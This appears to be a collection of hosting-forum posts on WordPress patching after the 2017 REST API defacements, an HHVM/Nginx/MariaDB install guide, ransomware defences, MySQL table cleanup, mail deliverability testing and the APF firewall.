Last week, we reported about a critical zero-day flaw in WordPress that was silently patched by the company before hackers got their hands on the nasty bug to exploit millions of WordPress websites.

To ensure the security of millions of websites and their users, WordPress delayed the vulnerability disclosure for over a week and worked closely with security companies and hosts to install the patch, ensuring that the issue was dealt with in short order before it became public.

But even after the company's effort to protect its customers, thousands of admins did not bother to update their websites, which are still vulnerable to the critical bug that has already been exploited by hackers.

While WordPress includes a default feature that automatically updates unpatched websites, some admins running critical services disable this feature in order to first test and then apply patches. Even the news blog of one of the famous Linux distributions, openSUSE (news.opensuse.org), was hacked, but restored immediately without a breach of any other part of openSUSE's infrastructure, CIO reports.

The vulnerability resided in the WordPress REST API and allowed an unauthenticated attacker to delete or modify all pages on unpatched websites and redirect their visitors to malicious exploits, enabling a large number of attacks.

The security researcher at Sucuri who privately disclosed the flaw to WordPress said they started noticing attacks leveraging this bug less than 48 hours after disclosure. They noticed at least four different campaigns targeting still unpatched websites.

In one such campaign, hackers were successful in replacing the content of over 66,000 web pages with "Hacked by" messages. The remaining campaigns targeted roughly 1,000 pages in total.

Besides defacing websites, such attacks appear to be carried out mostly for black hat SEO campaigns in order to spread spam and gain ranking in search engines, which is also known as search engine poisoning.

"What we expect to see is a lot more SEO spam (Search Engine Poisoning) attempts moving forward," explained Daniel Cid, CTO and founder of Sucuri. "There’s already a few exploit attempts that try to add spam images and content to a post. Due to the monetization possibilities, this will likely be the #1 route to abuse this vulnerability."

So, site administrators who have not yet updated their websites to the latest WordPress release 4.7.2 are urged to patch them immediately before becoming the next target of SEO spammers and hackers.

http://thehackernews.com/2017/02/wordpress-hack-seo.html
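For admins who want a quick way to check a server, here is a small Python sketch (my own, with the WordPress path as a placeholder assumption). It reads $wp_version from wp-includes/version.php and warns when the install is older than 4.7.2, the release that fixed the REST API flaw discussed above:

import re
from pathlib import Path

WP_ROOT = Path("/var/www/html")   # placeholder: path to your WordPress install
FIXED = (4, 7, 2)

text = (WP_ROOT / "wp-includes" / "version.php").read_text()
match = re.search(r"\$wp_version\s*=\s*'([^']+)'", text)
version = match.group(1)

parts = tuple(int(p) for p in re.findall(r"\d+", version)[:3])
status = "OK" if parts >= FIXED else "VULNERABLE - update to 4.7.2 or later"
print("WordPress", version, "-", status)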
-
Yes, in that same section anyone is always free to express their own - personal - opinion. Obviously, for example, my experiences as a customer do not necessarily amount to a reliable review of a company, even if my motives are sincere and disinterested.
-
In such cases, though, it is important to have a fairly long-term relationship with the provider, and in particular experience from the occasions when you actually needed their support.
-
Introduction If you’ve never heard about HHVM, it’s an open-source Virtual Machine designed for executing programs written in Hack and PHP. For performance reasons, it uses a just-in-time compilation process. Just like other similar projects, HHVM performs execution in a two-phase approach: first, it compiles PHP and Hack in an intermediate bytecode, then this bytecode is translated into AMD64 machine code at runtime, with a JIT (just-in-time) compiler. This tutorial demonstrates how to install WordPress with MariaDB, Nginx and, of course, HHVM on Ubuntu 16.04. Prerequisites As stated on the official page, HHVM supports only 64 bit architectures, so you need Ubuntu 16.04 Server 64bit. Install Nginx First, we install Nginx, which is available in Ubuntu repositories. Execute the following command: # apt install nginx The installation process is very quick. When it is complete, start Nginx: # systemctl start nginx Install and configure MariaDB MariaDB is also available in the repository, so just use apt: # apt-get install mariadb-client mariadb-server MariaDB is a MySQL fork, and it uses its name for the systemd service: # systemctl start mysql Set MariaDB root password to secure your database: # mysql_secure_installation You will be asked for the following configuration parameters: Enter current password for root (enter for none): PRESS ENTER Set root password? [Y/n] Y ENTER YOUR PASSWORD Remove anonymous users? [Y/n] Y Disallow root login remotely? [Y/n] Y Remove test database and access to it? [Y/n] Y Reload privilege tables now? [Y/n] Y Once that step is complete you can access the MariaDB database with your password: $ mysql -u root -p Use the MariaDB prompt to create a new database for WordPress. In this tutorial, we use mywordpressdb as the database name, and wordpressuser as the username for the WP installation. So our code looks like this: mysql> CREATE DATABASE mywordpressdb; mysql> CREATE USER wordpressuser@localhost IDENTIFIED BY 'my_strong_password'; mysql> GRANT ALL PRIVILEGES ON mywordpressdb.* to wordpressuser@localhost IDENTIFIED BY 'my_strong_password'; Next, you can flush privileges and exit: mysql> FLUSH PRIVILEGES; mysql> EXIT; Install HHVM HHVM is not available in the Ubuntu repository, so, first, it’s necessary to add an external one. This requires editing /etc/apt/sources.list and updating repos. Just execute the following commands: $ wget -O - http://dl.hhvm.com/conf/hhvm.gpg.key | sudo apt-key add - $ echo deb http://dl.hhvm.com/ubuntu xenial main | sudo tee /etc/apt/sources.list.d/hhvm.list # apt update Now, install HHVM with apt: # apt install -y hhvm Configure and test HHVM After installation, in /usr/share/hhvm there is a script for configuring the Nginx web server to use HHVM. Just execute the following: # /usr/share/hhvm/install_fastcgi.sh This is a quick process, at the end of which you can start HHVM: # systemctl start hhvm.service If you need to run web scripts, and you want it to start at boot, execute the command: # update-rc.d hhvm defaults You can decide to use HHVM for /usr/bin/php even if you have a php-cli already installed: # /usr/bin/update-alternatives --install /usr/bin/php php /usr/bin/hhvm 60 Next, you can test HHVM in different ways (for example, you can call it on existing PHP scripts present in your filesystem, just like php-cli). In this case, we use it on the web server. 
So, create a file called info.php in /var/www/html and enter the following lines: <?php phpinfo(); ?> Edit the Nginx Virtual Host file, adding index.php to it: # $EDITOR /etc/nginx/sites-available/default Here: index index.php index.html index.htm index.nginx-debian.html; After saving, exit, and test. With your browser, go to http://localhost/info.php Here, you should see HHVM at the top of the page: this means that it is working as expected. Install WordPress Now, you must install WordPress. This is quite easy, just execute the commands: # cd /var/www/html # wget wordpress.org/latest.zip # unzip latest.zip The unzip command will create a new folder, wordpress. Move all of its content into /var/www/html: # mv wordpress/* . # rm -rf wordpress/ Change the owner for the WordPress files: # find . -type d -exec chown www-data:www-data {} \; # find . -type f -exec chown www-data:www-data {} \; Rename wp-config-sample.php to wp-config.php, then edit it: # mv wp-config-sample.php wp-config.php # $EDITOR wp-config.php Here, change the database information to match what you specified in the MariaDB configuration process: DB_NAME = mywordpressdb DB_USER = wordpressuser DB_PASSWORD = my_strong_password Restart the server: # systemctl restart nginx After that, go to your server IP, and you will be redirected to the WordPress installation, which is completed entirely in your web browser. After filling out all of the required forms, WordPress will be ready for you! And that’s all you need to create your website with WP on Ubuntu 16.04 running Nginx, with HHVM. https://www.unixmen.com/install-wordpress-nginx-hhvm-mariadb-ubuntu-16-04/
-
Giannis, I have no idea - do you have a specific offer for us to look at?
-
Good morning!!! How does the whole effort look to you?
-
Welcome to designhost.gr.
Feel free to browse our community, where you can find various information and get to know the other members.
Do not hesitate to ask us about any question or clarification you may need.
-
This video walks you through the SSL/TLS Wizard to obtain a certificate for an arrangement of addon domains, subdomains, and parked/aliased domains. Music by bensound.com We filmed this tutorial with cPanel & WHM version 60 and the Paper Lantern theme, so the interface and features may differ from the current version. We'll produce newer tutorials as the feature evolves and improves. You can find documentation about the main cPanel interface at https://documentation.cpanel.net/disp... Please let us know if there are additional features or procedures that you would like for us to demonstrate with a walkthrough in video format.
-
benny Vasquez / Apr 21st, 2016 / Products

March 31st, 2017: The Day the Sun Sets on CentOS 5

CentOS 5 will reach end of life officially on March 31st of 2017, but as an industry we are already feeling the pain of people still using the out of date OS. Trying to support a system on an aging Operating System is not that far from trying to live in an aging apartment building. Ill-fitting fixtures, flickering electricity, and malfunctioning plumbing are just some of the daily struggles in those old buildings. Similarly, when the basic requirements of modern hosting are a struggle to maintain it has a severe and direct impact on every webhost’s quality of life.

cPanel & WHM version 56 (in the CURRENT tier as of April 11th, 2016, with an expected End of Life of May of 2017) will be the last version of cPanel to support CentOS 5, and 32bit Architecture. We have considered this heavily, and have decided to drop support for those things for two primary reasons:

As a software provider, the opportunity cost of continuing to support the oldest infrastructure is too high, and it severely limits the amount of new things we can deliver to our users.
As an industry, cPanel believes making it easier for people to continue to host on old, insecure, out of date software ultimately hurts us all. Deprecating support for older systems and older software is necessary for the overall health of the hosting industry.

cPanel is keeping its eye on the future, and letting the old software go. But we know how hard it traditionally is to migrate from an old server to a new one. To help with that we developed the Server Configuration addition to the transfer tool.

The Server Configuration Additions to the Transfer Tool

In version 11.44 we introduced the Transfer Tool, and it has proved a reliable tool to migrate accounts and packages between servers. As of v56 you can use it to transfer server configurations between servers as well. Note: This is intended to be used to transfer configurations from an existing v56 server to a new server. No attempt is made to back up configurations on the destination server. Additionally, this tool is not intended to be used to migrate configurations from compromised servers.

If you’re familiar with the transfer tool, you will find that the additions we’ve made are incredibly simple to use. Once you authenticate to the origin server, you’ll see an expandable section called “Service Configurations”. Click the ‘Show’ button, choose the configurations you want to transfer, and go through the Transfer Tool like you normally would. The configurations are moved to the new server, any relevant services are restarted, and you’re all set!

The same team that built this interface also expanded the functionality of the cpconftool, to help you complete a similar migration on the command line. The cpconftool is a command line utility that operates in a very similar way to pkgacct. You can read more about it on our documentation site. You can find the full documentation about the additions to the Transfer Tool in the Transfer Tool Documentation for v56. Note: Due to the potential complications involved, MySQL is currently not included in the WHM Transfer Tool interface. You can still copy your MySQL configuration using the command line tool cpconftool, or back up and manually copy your MySQL configuration.

v56 will be the last version of cPanel to support CentOS 5, the last version to support 32bit architecture.
Just in case it wasn’t obvious yet, we want you to upgrade, to migrate, and to keep using and providing new and better software. If you still have any hesitation about the Transfer Tool’s additions, I’d love to hear about it! Email me or tweet me, and let me know! https://blog.cpanel.com/end-of-life-for-centos5/
-
The evolution of extortionware https://techtalk.gfi.com/the-evolution-of-extortionware/ Debra Littlejohn Shinder on February 7, 2017 We’ve all heard a lot about ransomware that makes data inaccessible and/or locks up the computer or device until you pay for the encryption key. Now we’re seeing a variant on that theme that some call doxware, or extortionware, that goes further and threatens to release copies of the private documents, photos, and email messages on your computer to the public if you don’t pay up. It’s just one example of how malware has evolved over the past few years and is becoming more and more aggressive. Ransomware gets its name from the fact that it holds some or all of your files hostage and demands payment to release them. This particularly heinous type of malware has been around at least since the 1980s, when the incarnation known as AIDS appeared. Various ransomware Trojans have cropped up over the years, but really ramped up a few years ago as Bitcoin offered the opportunity for attackers to easily collect the money without going through traditional channels. CryptoLocker is one of the best-known examples of ransomware. The original version sprang to life in 2013, distributed via a botnet and malicious email attachments. The next year, the botnet was taken down by a consortium of law enforcement agencies, software vendors, commercial security research companies and academic security research departments at several prominent universities, in Operation Tovar. Not only was the botnet dismantled, but the private keys used to encrypt victims’ files were seized and made available, so that particular story had a happy ending. Unfortunately, it was far from the end of ransomware, and new extortionist malware programs have “borrowed” the CryptoLocker name even though they aren’t technically variants of it. Other well-known ransomware attacks include Cryptowall and Reveton for Windows, and KeeRanger on Mac OS X. Then there’s a whole other category of ransomware that targets smartphone and tablet operating systems. Extortionware goes mobile Many people today, especially young people, rarely use desktop or even laptop computers. That doesn’t mean they’ve sworn off the Internet; to the contrary, they’re online all the time, but they do it using mobile devices. So it’s no wonder the ransomware authors have turned their attention to creating malicious code that targets those devices. As mentioned in the introduction, there are basically two types of ransomware: Those that encrypt your data so you can’t view or use it, called (appropriately enough)encrypting ransomware Those that prevent you from logging onto the computer or device or from using one or more applications (such as your web browser), called blocking ransomware or just blockers. Note: There is also a variety of scamware called “scareware” that doesn’t really do anything but only threatens to; this includes those email messages that tell you the FBI has found something illegal on your computer and will arrest you if you don’t send money for the “fine.” Encrypting ransomware is the most popular on desktop operating systems, but they don’t work as well with mobile devices because the data is usually stored in the cloud instead of (or in addition to) on the device where the malware can hijack it. Thus a majority of mobile ransomware programs are blockers. Popular mobile ransomware blockers include Small, Fusob, Pletor and Svpeng. 
Small and Fusob combine the “threatware” idea with screen overlays that prevent you from using the apps on your device. Mobile ransomware is often disguised as a legitimate third party app or game, installed as a “drive-by download” from questionable websites, or through links in text messages.

Doxware takes electronic extortion to a new level

Doxing is a relatively new term that refers to the public release of private information about an individual or organization. Doxware does (or threatens to do) exactly the opposite of what traditional ransomware does; instead of locking up your sensitive “docs” and making them inaccessible to you, it makes them accessible to everybody – unless you pay up. If encrypting and blocking extortionware is analogous to hostage-taking for ransom, doxware is comparable to the blackmailer who demands money to keep your secrets quiet. For this reason, doxware is sometimes also called leakware.

Doxware often targets email and word processing files. Mobile variants could release private messages, pictures or contact lists from users’ phones. Doxware can be more effective than ransomware at invoking a positive (from the attacker’s point of view) response because victims can circumvent regular ransomware encryption by maintaining separate backups of data, or get past blockers by formatting the hard drive and doing a clean restore. However, once an attacker has information that you don’t want made public, there is little you can do to prevent that other than pay up.

The scope of the problem

Even though it’s been with us for a long time, the proliferation of extortionware has exploded over the last few years, and some have dubbed 2016 “the year of ransomware” as both the distribution and the code itself became more sophisticated and touched more and more computer and device users. I’ve never had to deal with extortionware on my own systems (thanks in part to careful security practices and in part to good luck) but I have a number of friends and relatives from all walks of life, including a few in the IT industry, who have fallen victim to it.

Both individual users and businesses are vulnerable. An Osterman Research survey in 2016 showed that nearly half of respondents said their organizations had been the victim of a ransomware attack during the previous 12 months. CNN statistics showed $209 million paid to ransomware attackers in the first quarter of 2016, and FBI estimates indicated a likely ransomware loss of $1 billion or more for the year. In addition, the average ransomware demand increased from $294 in 2015 to $679 in 2016. While that $679 average might not seem like much, smaller amounts extorted from individuals are balanced by much larger ransoms targeting organizations, such as the $3.4 million that cybercriminals demanded from Hollywood Presbyterian hospital in early 2016.

Protecting against extortionware

Obviously extortionware is a big threat and should be on your security radar. So how do you protect your organization from it?
As you might guess, many of the recommended measures are the same ones used to protect against other types of malware:
- Keep your OS and applications updated and install all security patches
- Back up important files regularly to a location that is disconnected when not backing up (to prevent ransomware from also encrypting your backup files)
- Authenticate inbound email
- Implement ad blocking in web browsers, since malware is often delivered through “malvertisements,” even on legitimate sites
- Disable unneeded services (CryptoLocker, for example, often targeted machines using Remote Desktop Protocol, so disabling RDP if you don’t use it helps protect against it)
- Educate users in safe computing practices and reinforce the message on a regular basis:
  - Don’t click on links in email, in texts, or on web sites you don’t trust
  - Show hidden file extensions so executables can’t be disguised as PDFs, JPGs or other more innocuous file types
  - Don’t visit questionable web sites (porn, warez, music piracy sites, hacker forums, etc.)
  - Don’t download mobile apps from untrusted sources

Several of the popular security vendors offer security suites that protect against malware, including extortionware. They also offer mobile security solutions that scan your phone or tablet, check apps against their databases of known threats, and warn you of websites that are infected with ransomware (or other malware).

Most experts recommend that you not pay the ransom, as this encourages the criminals – and in many cases victims have paid and never received the keys, or received keys that didn’t work. Remember that criminals, by definition, are not trustworthy and are prone to not keeping their promises.

Summary

Extortionware is big business and becoming more so. Companies and other large organizations are prime targets because they’re seen as having deep pockets.
-
Tagged with:
- ransomware
- extortionware
(and 1 more)
-
Many people know MX Toolbox ( http://mxtoolbox.com/ ), but far fewer have noticed that it offers its own deliverability tool: https://mxtoolbox.com/deliverability

How it works:
Step 1: Send an email to ping@tools.mxtoolbox.com
Step 2: Once you have sent that message it will reply. Click the link: "View your full Deliverability Report"

ABOUT EMAIL DELIVERABILITY
This tool requires you to send a test message to MxToolbox. Our systems analyze the headers, the blacklist reputation of your outbound IP address, and your SPF records to generate a comprehensive deliverability report.
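If you want to run the check from the very server whose outbound reputation you care about, you can send the test message straight from the command line. A minimal sketch, assuming the box has a configured MTA and the mailx/mail command installed (the subject line is just a placeholder):

# send the probe through this server's own MTA, so MxToolbox sees the real
# outbound IP, headers and SPF result of the machine you are testing
echo "MxToolbox deliverability test" | mail -s "deliverability test" ping@tools.mxtoolbox.com

The automated reply with the report link goes back to the From: address your MTA stamps on the message, so send from a mailbox you can actually read.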
-
It has happened that a password gets changed in Active Directory (and therefore the MS Exchange password as well), yet the ActiveSync handheld keeps synchronizing the mailbox with the old password for hours afterwards.... In practice the two articles below explain it, especially the first one: here is how it is supposed to work, and here is how it actually behaves.
http://www.techrepublic.com/article/why-does-my-old-password-work-via-activesync/
https://social.technet.microsoft.com/Forums/office/en-US/e792fd57-84b2-4e48-8281-99b062b8a014/activesync-can-sync-6-hours-after-changing-password-in-ad-before-client-asks-for-new-credentials?forum=exchangesvrclientslegacy
-
Sometimes I need to re-import a database from SQL data that does not contain DROP statements. In that case the import usually stops early with something like this:

"ERROR 1050 (42S01) at line xx: Table 'db_table' already exists"

Instead of dropping the database, recreating it and then recreating the user connections all over again, there is also the following query, which generates the DROP statements for every table in the database:

SELECT CONCAT('DROP TABLE ', TABLE_NAME, ';') FROM INFORMATION_SCHEMA.tables WHERE TABLE_SCHEMA = '{database name}';

You will see something like this (example from a WP database):

+----------------------------------------+
| CONCAT('DROP TABLE ', TABLE_NAME, ';') |
+----------------------------------------+
| DROP TABLE wpdbase_commentmeta; |
| DROP TABLE wpdbase_comments; |
| DROP TABLE wpdbase_links; |
| DROP TABLE wpdbase_options; |
| DROP TABLE wpdbase_pmxi_history; |
| DROP TABLE wpdbase_postmeta; |
| DROP TABLE wpdbase_posts; |
| DROP TABLE wpdbase_term_relationships; |
| DROP TABLE wpdbase_term_taxonomy; |
| DROP TABLE wpdbase_termmeta; |
| DROP TABLE wpdbase_terms; |
| DROP TABLE wpdbase_usermeta; |
| DROP TABLE wpdbase_users; |
| DROP TABLE wpdbase_wysija_campaign; |
| DROP TABLE wpdbase_wysija_campaign_list; |
| DROP TABLE wpdbase_wysija_custom_field; |
| DROP TABLE wpdbase_wysija_email; |
| DROP TABLE wpdbase_wysija_email_user_stat; |
| DROP TABLE wpdbase_wysija_email_user_url; |
| DROP TABLE wpdbase_wysija_form; |
| DROP TABLE wpdbase_wysija_list; |
| DROP TABLE wpdbase_wysija_queue; |
| DROP TABLE wpdbase_wysija_url; |
| DROP TABLE wpdbase_wysija_url_mail; |
| DROP TABLE wpdbase_wysija_user; |
| DROP TABLE wpdbase_wysija_user_field; |
| DROP TABLE wpdbase_wysija_user_history; |
| DROP TABLE wpdbase_wysija_user_list; |
+----------------------------------------+
28 rows in set (0.00 sec)

You can then easily drop them all with a simple copy-paste. I have found other solutions as well, and there is surely a better one:
http://stackoverflow.com/questions/27606518/how-to-drop-all-tables-from-a-database-with-one-sql-query
http://stackoverflow.com/questions/536350/drop-all-the-tables-stored-procedures-triggers-constraints-and-all-the-depend
http://stackoverflow.com/questions/11053116/mysql-bulk-drop-table-where-table-like
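If you prefer to skip the copy-paste step, the same idea works as a shell one-liner: generate the DROP statements with one mysql call and pipe them straight back into a second one. A minimal sketch, assuming shell access, credentials in ~/.my.cnf (or added via -u/-p), and a hypothetical database name your_db; note it drops the tables immediately, and InnoDB foreign keys may require re-running it or temporarily disabling FOREIGN_KEY_CHECKS:

DB="your_db"   # hypothetical database name, replace with the real one
# -N skips the column header, -B gives plain batch output (no ASCII table borders)
mysql -N -B -e "SELECT CONCAT('DROP TABLE \`', TABLE_NAME, '\`;') FROM INFORMATION_SCHEMA.tables WHERE TABLE_SCHEMA='${DB}';" | mysql "${DB}"

If you control how the dump is produced in the first place, mysqldump's --add-drop-table option (enabled by default as part of --opt) sidesteps the whole issue, because the dump then carries its own DROP statements.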
-
Current Release:
http://www.rfxn.com/downloads/apf-current.tar.gz
http://www.rfxn.com/appdocs/README.apf
http://www.rfxn.com/appdocs/CHANGELOG.apf

Description:
Advanced Policy Firewall (APF) is an iptables (netfilter) based firewall system designed around the essential needs of today’s Internet-deployed servers and the unique needs of custom-deployed Linux installations. The configuration of APF is designed to be very informative and to walk the user through an easy-to-follow process, from top to bottom of the configuration file. On the technical side, APF utilizes the latest stable features of the iptables (netfilter) project to provide a very robust and powerful firewall.

The filtering performed by APF is threefold:
1) Static rule-based policies (not to be confused with a “static firewall”)
2) Connection-based stateful policies
3) Sanity-based policies

The first, static rule-based policies, is the most traditional method of firewalling. This is when the firewall has an unchanging set of instructions (rules) on how traffic should be handled in certain conditions. An example of a static rule-based policy would be allowing/denying an address access to the server with the trust system, or opening a new port with conf.apf. In short, these are rules that change infrequently or never while the firewall is running.

The second, connection-based stateful policies, is a means to distinguish legitimate packets for different types of connections. Only packets matching a known connection will be allowed by the firewall; others will be rejected. An example of this would be FTP data transfers: in an older era of firewalling you would have to define a complex set of static policies to allow FTP data transfers to flow without a problem. Not so with stateful policies; the firewall can see that an address has established a connection to port 21, then “relate” that address to the data transfer portion of the connection and dynamically alter the firewall to allow the traffic.

The third, sanity-based policies, is the ability of the firewall to match various traffic patterns to known attack methods, or to scrutinize traffic for conformance to Internet standards. An example of this would be when a would-be attacker attempts to forge the source IP address of data they are sending to you: APF can simply discard this traffic, or optionally log it and then discard it. To the same extent, another example would be when a broken router on the Internet begins to relay malformed packets to you: APF can simply discard them or, in other situations, reply to the router and have it stop sending you new packets (TCP Reset).
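To make the static-rule side of the description above concrete, here is a minimal sketch of everyday APF usage, assuming a stock install under /etc/apf; the port list and IP addresses are placeholders, not recommendations:

# /etc/apf/conf.apf (excerpt): static inbound policy, i.e. which TCP ports stay open
IG_TCP_CPORTS="22,80,443"

# trust system: allow or deny individual addresses, then reload the rules
apf -a 203.0.113.10    # adds the host to allow_hosts.rules and loads an accept rule
apf -d 198.51.100.25   # adds the host to deny_hosts.rules and loads a drop rule
apf -r                 # flush and reload the full rule set

The conf.apf directive and the trust files both feed the static layer described above; the stateful and sanity checks are applied by APF on top of them without any extra configuration.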
Features:
– detailed and well-commented configuration file
– granular inbound and outbound network filtering
– user-id based outbound network filtering
– application based network filtering
– trust based rule files with an optional advanced syntax
– global trust system where rules can be downloaded from a central management server
– reactive address blocking (RAB), next generation in-line intrusion prevention
– debug mode provided for testing new features and configuration setups
– fast load feature that allows 1000+ rules to load in under 1 second
– inbound and outbound network interfaces can be independently configured
– global tcp/udp port & icmp filtering with multiple filters (drop, reject, prohibit)
– configurable policies for each ip on the system with convenience variables to import settings
– packet flow rate limiting that prevents abuse of the most widely abused protocol, icmp
– prerouting and postrouting rules for optimal network performance
– dshield.org block list support to ban networks exhibiting suspicious activity
– Spamhaus Don’t Route Or Peer list support to ban known “hijacked zombie” IP blocks
– any number of additional interfaces may be configured as trusted or untrusted
– additional firewalled interfaces can have their own unique firewall policies applied
– intelligent route verification to prevent embarrassing configuration errors
– advanced packet sanity checks to make sure traffic coming and going meets the strictest of standards
– filters attacks such as fragmented UDP, port zero floods, stuffed routing, arp poisoning and more
– configurable type-of-service options to dictate the priority of different types of network traffic
– intelligent default settings to suit everyday server setups
– dynamic configuration of your server’s local DNS resolvers into the firewall
– optional filtering of common p2p applications
– optional filtering of private & reserved IP address space
– optional implicit blocking of the ident service
– configurable connection tracking settings to scale the firewall to the size of your network
– configurable kernel hooks (ties) to further harden the system against syn-flood attacks & routing abuses
– advanced network control such as explicit congestion notification and overflow control
– helper chains for FTP DATA and SSH connections to prevent client-side issues
– optional rate-limited event logging
– logging subsystem that allows logging data to user-space programs or standard syslog files
– comprehensive logging of every rule added
– detailed startup error checking
– if you are familiar with netfilter you can create your own rules in any of the policy files
– pluggable and ready advanced use of QoS algorithms provided by the Linux kernel
– 3rd-party add-on projects that complement APF features

Funding:
Funding for the continued development and research into this and other projects is solely dependent on public contributions and donations. If this is your first time using this software, we ask that you evaluate it and consider a small donation; for those who are frequent and continued users of this and other projects, we also ask that you make an occasional donation to help ensure the future of our public projects.

https://www.rfxn.com/projects/advanced-policy-firewall/
-
Some members may curse at me for this, but I’ll risk it!
-
Hello akimo,
Welcome to designhost.gr.
Feel free to browse our community, access all sorts of information, and get to know our members.
Do not hesitate to ask anything in our forums.
designhost.gr